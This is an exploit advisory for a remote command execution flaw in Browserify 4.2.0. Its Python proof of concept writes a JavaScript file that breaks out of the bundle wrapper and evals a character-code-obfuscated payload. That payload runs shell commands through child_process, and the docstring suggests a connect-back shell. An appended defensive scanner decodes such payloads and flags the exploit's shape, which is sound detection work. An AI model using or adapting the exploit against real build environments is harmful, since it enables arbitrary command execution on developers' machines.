Browserify 4.2.0 Remote Command Execution

2014.07.16
Credit: Cal Leeming
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

#!/usr/bin/python
"""
Browserify POC exploit

http://iops.io/blog/browserify-rce-vulnerability/

To run, just do:

$ python poc.py > exploit.js
$ browserify exploit.js
BITCH I TOLD YOU THIS SHIT IS FABULOUS
[[garbage output]]
},{}]},{},[1])
 00:08:32 up 12:29, 3 users, load average: 0.00, 0.02, 0.05
uid=1001(foxx) gid=1001(foxx) groups=1001(foxx),27(sudo),105(fuse)

You can also spawn() and create a connect back shell.

Enjoy
"""

def charencode(string):
    encoded=''
    for char in string:
        encoded=encoded+","+str(ord(char))
    return encoded[1:]

plaintext = """
var require = this.process.mainModule.require;
var sys = require('sys')
var exec = require('child_process').exec;
function puts(error, stdout, stderr) { sys.puts(stdout) }
exec("uptime && id", puts);
console.log("BITCH I TOLD YOU THIS SHIT IS FABULOUS");
"""

payload = charencode(plaintext)
final = "eval(String.fromCharCode(%s));" %(payload)

print "});"
print final
print "(function(){"

References:

http://iops.io/blog/browserify-rce-vulnerability/
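
A defensive counterpart to the PoC above, as an added example that is not part of the original advisory: a pre-bundle check that decodes `String.fromCharCode(...)` literals in a JavaScript file and flags the shape the PoC prints (a leading `});`, a trailing `(function(){`, and an `eval` of character codes). The function names, the marker list and the sample inputs are assumptions constructed for illustration.

```python
import re

# Matches String.fromCharCode(<decimal list>), the form the PoC's charencode() feeds.
FROM_CHAR_CODE = re.compile(r"String\s*\.\s*fromCharCode\s*\(\s*([0-9,\s]+?)\s*\)")
EVAL_OF_CODES = re.compile(r"\beval\s*\(\s*String\s*\.\s*fromCharCode")

# Heuristic markers (assumed list): Node-only handles that the PoC payload reaches for.
SUSPICIOUS = ("child_process", "process.mainModule")

def decode_char_codes(source):
    """Return the plaintext of every String.fromCharCode(...) literal in source."""
    decoded = []
    for match in FROM_CHAR_CODE.finditer(source):
        codes = [int(tok) for tok in match.group(1).split(",") if tok.strip()]
        # Ignore out-of-range values instead of raising on junk input.
        if all(0 <= c <= 0x10FFFF for c in codes):
            decoded.append("".join(chr(c) for c in codes))
    return decoded

def scan(source):
    """Return an ordered list of findings for one JavaScript source string."""
    findings = []
    stripped = source.strip()
    # The PoC output starts by closing a wrapper and ends by reopening one.
    if stripped.startswith("})") and stripped.endswith("(function(){"):
        findings.append("wrapper-breakout")
    if EVAL_OF_CODES.search(source):
        findings.append("eval-of-charcodes")
    # Look for markers in the raw text and in every decoded literal.
    for text in [source] + decode_char_codes(source):
        for marker in SUSPICIOUS:
            tag = "marker:" + marker
            if marker in text and tag not in findings:
                findings.append(tag)
    return findings

def _encode(text):
    # Same comma-separated decimal form as the PoC's charencode().
    return ",".join(str(ord(ch)) for ch in text)

# Constructed samples: an inert string in the PoC's shape, and an ordinary module.
SAMPLE_BAD = "});\neval(String.fromCharCode(%s));\n(function(){" % _encode(
    "var r = this.process.mainModule.require; r('child_process');")
SAMPLE_OK = "module.exports = function (a, b) { return a + b; };"

if __name__ == "__main__":
    for name, src in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        print(name, scan(src))
```

A non-empty result is a reason to review the file before passing it to a bundler, not proof of compromise; the markers are string matches and can be evaded by other encodings.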

